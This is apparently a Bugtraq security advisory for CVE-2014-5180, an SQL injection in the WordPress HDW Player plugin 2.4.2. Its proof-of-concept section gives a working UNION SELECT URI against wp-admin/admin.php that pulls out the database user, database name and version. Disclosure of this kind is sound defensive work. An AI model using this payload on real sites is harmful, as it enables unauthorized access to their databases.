BID:69105

WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability

Info

WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability

Bugtraq ID:	69105
Class:	Input Validation Error
CVE:	CVE-2014-5180
Remote:	Yes
Local:	No
Published:	May 28 2014 12:00AM
Updated:	May 28 2014 12:00AM
Credit:	Anant Shrivastava
Vulnerable:	HDWPlayer HDW-Player-Video-Player-Video-Gallery 2.4.2

Not Vulnerable:

Exploit / POC

WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12

Solution / Fix

WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability

References:

WordPress HDW Player Plugin (Video Player & Video Gallery) - Homepage (HDWPlayer)
wp-plugin : hdw-player-video-player-video-gallery �?? A1-Injection (Anant Shrivastava)